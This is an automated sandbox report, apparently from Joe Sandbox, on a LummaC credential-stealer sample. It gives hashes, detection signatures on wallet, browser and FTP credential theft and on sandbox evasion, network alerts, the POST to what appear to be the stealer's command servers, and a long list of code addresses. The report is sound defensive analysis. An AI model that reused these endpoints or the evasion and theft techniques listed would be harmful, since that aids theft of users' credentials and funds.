Edit tour

Windows Analysis Report
CgmaT61.exe

Overview

General Information

Sample name:	CgmaT61.exe
Analysis ID:	1632116
MD5:	a62fe491673f0de54e959defbfebd0dd
SHA1:	f13d65052656ed323b8b2fca8d90131f564b44dd
SHA256:	936d17e301a6f5b6878b1a6f46a215d5af02d8254c65dc64a8679f7b2ff25213
Tags:	exeLummaStealeruser-aachum
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for submitted file

Yara detected LummaC Stealer

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Joe Sandbox ML detected suspicious sample

PE file contains section with special chars

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Detected potential crypto function

Entry point lies outside standard sections

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

CgmaT61.exe (PID: 6932 cmdline: "C:\Users\user\Desktop\CgmaT61.exe" MD5: A62FE491673F0DE54E959DEFBFEBD0DD)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1050910887.0000000001696000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1051038294.00000000016A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: CgmaT61.exe PID: 6932	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: CgmaT61.exe PID: 6932	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.CgmaT61.exe.a40000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T19:45:53.043159+0100	2028371	3	Unknown Traffic	192.168.2.8	49682	104.21.16.1	443	TCP
2025-03-07T19:45:55.841399+0100	2028371	3	Unknown Traffic	192.168.2.8	49683	104.21.16.1	443	TCP
2025-03-07T19:45:58.716295+0100	2028371	3	Unknown Traffic	192.168.2.8	49684	104.21.16.1	443	TCP
2025-03-07T19:46:01.841356+0100	2028371	3	Unknown Traffic	192.168.2.8	49685	104.21.16.1	443	TCP
2025-03-07T19:46:04.918378+0100	2028371	3	Unknown Traffic	192.168.2.8	49686	104.21.16.1	443	TCP
2025-03-07T19:46:07.920024+0100	2028371	3	Unknown Traffic	192.168.2.8	49687	104.21.16.1	443	TCP
2025-03-07T19:46:11.156472+0100	2028371	3	Unknown Traffic	192.168.2.8	49688	104.21.16.1	443	TCP
2025-03-07T19:46:12.965778+0100	2028371	3	Unknown Traffic	192.168.2.8	49689	188.114.97.3	443	TCP

HTTP traffic detected: POST /JnsHY HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 59Host: arisechairedd.shop

Source: CgmaT61.exe, 00000000.00000003.1018093539.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: CgmaT61.exe, 00000000.00000003.1018093539.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: CgmaT61.exe, 00000000.00000003.1018093539.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: CgmaT61.exe, 00000000.00000003.1018093539.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: CgmaT61.exe, 00000000.00000003.1018093539.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: CgmaT61.exe, 00000000.00000003.1018093539.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: CgmaT61.exe, 00000000.00000003.1018093539.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: CgmaT61.exe, 00000000.00000003.1018093539.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: CgmaT61.exe, 00000000.00000003.1018093539.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: CgmaT61.exe, 00000000.00000003.1018093539.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: CgmaT61.exe, 00000000.00000003.1018093539.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: CgmaT61.exe, 00000000.00000003.960749697.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: CgmaT61.exe, 00000000.00000002.1159657676.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.959101555.0000000001673000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arisechairedd.shop/
Source: CgmaT61.exe, 00000000.00000002.1158418617.00000000016F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arisechairedd.shop/6?
Source: CgmaT61.exe, 00000000.00000002.1158287422.0000000001673000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1116238405.0000000001705000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1157303208.0000000001673000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1099204309.0000000001705000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000002.1158418617.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1048535927.000000000170D000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1116319569.0000000001673000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1116565841.000000000170D000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1017572684.000000000170D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arisechairedd.shop/JnsHY
Source: CgmaT61.exe, 00000000.00000003.1017572684.000000000170D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arisechairedd.shop/JnsHY(
Source: CgmaT61.exe, 00000000.00000003.1048535927.000000000170D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arisechairedd.shop/JnsHY82c
Source: CgmaT61.exe, 00000000.00000002.1158287422.0000000001673000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1157303208.0000000001673000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1116319569.0000000001673000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arisechairedd.shop/JnsHY?z
Source: CgmaT61.exe, 00000000.00000003.1157371253.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000002.1158366508.00000000016A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arisechairedd.shop/JnsHYID
Source: CgmaT61.exe, 00000000.00000003.1098606372.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1157371253.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000002.1158366508.00000000016A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arisechairedd.shop/JnsHYY
Source: CgmaT61.exe, 00000000.00000003.959047272.000000000168B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arisechairedd.shop/JnsHYf
Source: CgmaT61.exe, 00000000.00000002.1158287422.0000000001673000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1157303208.0000000001673000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arisechairedd.shop/JnsHYg
Source: CgmaT61.exe, 00000000.00000003.1116238405.0000000001705000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1077586110.0000000001705000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1099204309.0000000001705000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1077701174.000000000170D000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1048535927.000000000170D000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1116565841.000000000170D000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1017572684.000000000170D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arisechairedd.shop/JnsHYh
Source: CgmaT61.exe, 00000000.00000003.1116238405.0000000001705000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1099204309.0000000001705000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1116565841.000000000170D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arisechairedd.shop/JnsHYmeP
Source: CgmaT61.exe, 00000000.00000003.1116238405.0000000001705000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1099204309.0000000001705000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arisechairedd.shop/V?
Source: CgmaT61.exe, 00000000.00000003.1077586110.0000000001705000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arisechairedd.shop/n?
Source: CgmaT61.exe, 00000000.00000002.1158418617.00000000016F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begindecafer.world/
Source: CgmaT61.exe, 00000000.00000002.1158418617.00000000016F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begindecafer.world/QwdZdf
Source: CgmaT61.exe, 00000000.00000002.1158287422.0000000001673000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1157303208.0000000001673000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begindecafer.world/QwdZdfh
Source: CgmaT61.exe, 00000000.00000002.1158418617.00000000016F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begindecafer.world/QwdZdfp
Source: CgmaT61.exe, 00000000.00000002.1158418617.00000000016F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begindecafer.world/V
Source: CgmaT61.exe, 00000000.00000002.1158418617.00000000016F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begindecafer.world:443/QwdZdf
Source: CgmaT61.exe, 00000000.00000003.1019389828.0000000005D89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: CgmaT61.exe, 00000000.00000003.960749697.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: CgmaT61.exe, 00000000.00000003.960749697.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: CgmaT61.exe, 00000000.00000003.960749697.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: CgmaT61.exe, 00000000.00000003.1019389828.0000000005D89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: CgmaT61.exe, 00000000.00000003.960749697.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: CgmaT61.exe, 00000000.00000003.960749697.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: CgmaT61.exe, 00000000.00000003.960749697.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: CgmaT61.exe, 00000000.00000003.960749697.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: CgmaT61.exe, 00000000.00000003.1019389828.0000000005D89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: CgmaT61.exe, 00000000.00000003.1019062043.0000000005EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: CgmaT61.exe, 00000000.00000003.1019062043.0000000005EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: CgmaT61.exe, 00000000.00000003.1048116190.0000000005D88000.00000004.00000800.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000002.1159657676.0000000005D88000.00000004.00000800.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1098665705.0000000005D81000.00000004.00000800.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1081109394.0000000005D81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: CgmaT61.exe, 00000000.00000003.960749697.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20w
Source: CgmaT61.exe, 00000000.00000003.960749697.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: CgmaT61.exe, 00000000.00000003.1018914477.0000000005DC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: CgmaT61.exe, 00000000.00000003.1019062043.0000000005EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: CgmaT61.exe, 00000000.00000003.1019062043.0000000005EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: CgmaT61.exe, 00000000.00000003.1019062043.0000000005EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: CgmaT61.exe, 00000000.00000003.1019062043.0000000005EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49689
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49688
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49686
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown	Network traffic detected: HTTP traffic on port 49686 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49689 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49684 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49688 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49682 -> 443

Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.8:49682 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.8:49683 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.8:49684 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.8:49685 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.8:49686 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.8:49687 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49689 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: CgmaT61.exe	Static PE information: section name:
Source: CgmaT61.exe	Static PE information: section name: .idata
Source: CgmaT61.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A700B0	0_2_00A700B0
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A8C320	0_2_00A8C320
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A5A430	0_2_00A5A430
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A68900	0_2_00A68900
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A6CBB0	0_2_00A6CBB0
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A60B40	0_2_00A60B40
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A8D0C0	0_2_00A8D0C0
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A5B1D8	0_2_00A5B1D8
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A773CB	0_2_00A773CB
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A555F6	0_2_00A555F6
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A876C0	0_2_00A876C0
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A4D780	0_2_00A4D780
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A89775	0_2_00A89775
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A838C0	0_2_00A838C0
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A51822	0_2_00A51822
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A4DA3A	0_2_00A4DA3A
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A83C30	0_2_00A83C30
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A8C0A0	0_2_00A8C0A0
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A5E0AC	0_2_00A5E0AC
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B6C0A6	0_2_00B6C0A6
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AB408F	0_2_00AB408F
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AEE09A	0_2_00AEE09A
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B4C082	0_2_00B4C082
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091	0_2_00C14091
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AFE0D2	0_2_00AFE0D2
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B76037	0_2_00B76037
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B5A030	0_2_00B5A030
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AE6028	0_2_00AE6028
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AD603E	0_2_00AD603E
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B50020	0_2_00B50020
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B06018	0_2_00B06018
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B26066	0_2_00B26066
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B4806E	0_2_00B4806E
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B0806C	0_2_00B0806C
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00ABC04C	0_2_00ABC04C
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C1A034	0_2_00C1A034
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AD2057	0_2_00AD2057
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B441B5	0_2_00B441B5
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AB81A9	0_2_00AB81A9
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AF218E	0_2_00AF218E
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B62194	0_2_00B62194
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A60180	0_2_00A60180
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B6E185	0_2_00B6E185
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B041E2	0_2_00B041E2
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A761D8	0_2_00A761D8
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A72120	0_2_00A72120
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B3E125	0_2_00B3E125
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C1015E	0_2_00C1015E
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B00101	0_2_00B00101
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AD816F	0_2_00AD816F
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AFA16C	0_2_00AFA16C
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AC2169	0_2_00AC2169
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B54165	0_2_00B54165
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AC0178	0_2_00AC0178
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A7617E	0_2_00A7617E
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B2016F	0_2_00B2016F
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AE414E	0_2_00AE414E
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B74150	0_2_00B74150
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AF82A1	0_2_00AF82A1
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B1C2A5	0_2_00B1C2A5
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B6029A	0_2_00B6029A
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AE0292	0_2_00AE0292
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B162F3	0_2_00B162F3
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B262F4	0_2_00B262F4
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B702F1	0_2_00B702F1
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B242E3	0_2_00B242E3
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AD22FA	0_2_00AD22FA
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A762F9	0_2_00A762F9
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A5E2C6	0_2_00A5E2C6
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AC82CA	0_2_00AC82CA
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00ABA2CC	0_2_00ABA2CC
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B642DE	0_2_00B642DE
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AB62D2	0_2_00AB62D2
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B5E2CF	0_2_00B5E2CF
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AE2227	0_2_00AE2227
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B3021E	0_2_00B3021E
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B1A206	0_2_00B1A206
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B78257	0_2_00B78257
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A88240	0_2_00A88240
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AF425C	0_2_00AF425C
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00ACE3AE	0_2_00ACE3AE
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B4A3B2	0_2_00B4A3B2
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B2839C	0_2_00B2839C
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A4A390	0_2_00A4A390
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AD43E5	0_2_00AD43E5
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AF23F7	0_2_00AF23F7
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AE83F2	0_2_00AE83F2
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AC63DC	0_2_00AC63DC
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B52338	0_2_00B52338
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AEA335	0_2_00AEA335
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A56312	0_2_00A56312
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B2E30D	0_2_00B2E30D
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B6C4BF	0_2_00B6C4BF
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AD649D	0_2_00AD649D
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AEE493	0_2_00AEE493
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AE24E1	0_2_00AE24E1
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AB04FD	0_2_00AB04FD
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B684EC	0_2_00B684EC
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B5C4D5	0_2_00B5C4D5
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AB84C9	0_2_00AB84C9
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B664D2	0_2_00B664D2
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B604DF	0_2_00B604DF
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AB44DB	0_2_00AB44DB
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B7C4C5	0_2_00B7C4C5
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AD242D	0_2_00AD242D
